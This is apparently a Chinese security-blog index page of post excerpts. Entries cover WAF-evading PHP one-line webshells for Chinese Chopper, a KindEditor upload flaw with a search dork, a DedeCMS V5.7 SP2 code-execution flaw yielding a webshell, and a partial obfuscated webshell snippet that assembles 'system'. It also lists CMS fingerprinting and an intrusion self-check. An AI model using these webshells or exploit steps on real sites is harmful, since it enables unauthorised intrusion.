webshell爆破脚本

H]4W3H4X}3GC)EJ1KE9(Q.png

Whatcms - 支持超过300+的cms识别与漏洞检测工具

项目地址:https://whatcms.org/识别模式要检测CMS的使用情况,我们使用以下方法。MetaCMS有时会在每个页面的html中包含一个元标记。 这通常是一个“发电机”标签,如<meta name =“generator”content =“什么CMS”/>,但也可以是“应用程序名称”,“Powered-By”或CMS创建者决定使用的任何其他内容。Headers可以在相同的情况下使用HTTP标头(包括Cookie)来标识CMS。Markup如果一个CMS没有meta标记

发一个过狗一句话

过狗一句话

kindeditor最新上传漏洞

漏洞存在于 kindeditor 编辑器里,你能上传. txt 和. html 文件,支持 php/asp/jsp/asp.net漏洞存在于小于等于 kindeditor4.1.5 编辑器中根本脚本语言自定义不同的上传地址,上传之前有必要验证文件 upload_json.* 的存在/asp/upload_json.asp/asp.net/upload_json.ashx/jsp/upload_json.jsp/php/upload_json.php关键字:allinurl:/examples/u

中国菜刀专用过狗免杀PHP一句话

   中国菜刀专用过狗一句话

dedecms织梦找后台地址最新方法

1.png

C段查询功能已恢复正常!

同IP网站查询

DedeCMS V5.7 SP2后台存在代码执行漏洞

简介 织梦内容管理系统(DedeCms)是一款PHP开源网站管理系统。DedeCMS V5.7 SP2版本中tpl.php存在代码执行漏洞,攻击者可利用该漏洞在增加新的标签中上传木马,获取webshell。笔者是2018年2月28日在官网下载的DedeCMS V5.7 SP2版本程序,截至发稿,漏洞依然存在。漏洞详情织梦默认的后台地址是/dede/,当然也可以被更改,到时候根据网站具体情况替换默认后台地址即可。dede/tpl.php中第251行到281行csrf_check();if

php过狗一句话

<?php
/*

isDog

*/
                // $a assert
        $a = "0,1,2,3,4,5,s,y,s,t,e,m";
        // 根据','转换成数组
        $array = explode(",",$a);
                // 空变量


快速自检电脑是否被黑客入侵过(Linux版)

之前写了一篇《快速自检电脑是否被黑客入侵过(Windows版)》, 这次就来写写Linux版本的。前言严谨地说, Linux只是一个内核, `GNU Linux`才算完整的操作系统, 但在本文里还是用通俗的叫法,把`Ubuntu`,`Debian`,`RedHat`,`CentOS`,`ArchLinux`等发行版都统称为`Linux`.本文里所说的方法不仅对Linux的发行版适用, 部分方法对`Mac OSX`操作系统也是适用的.异常的帐号和权限如果黑客曾经获得过命令运行的机会, 对方往往会想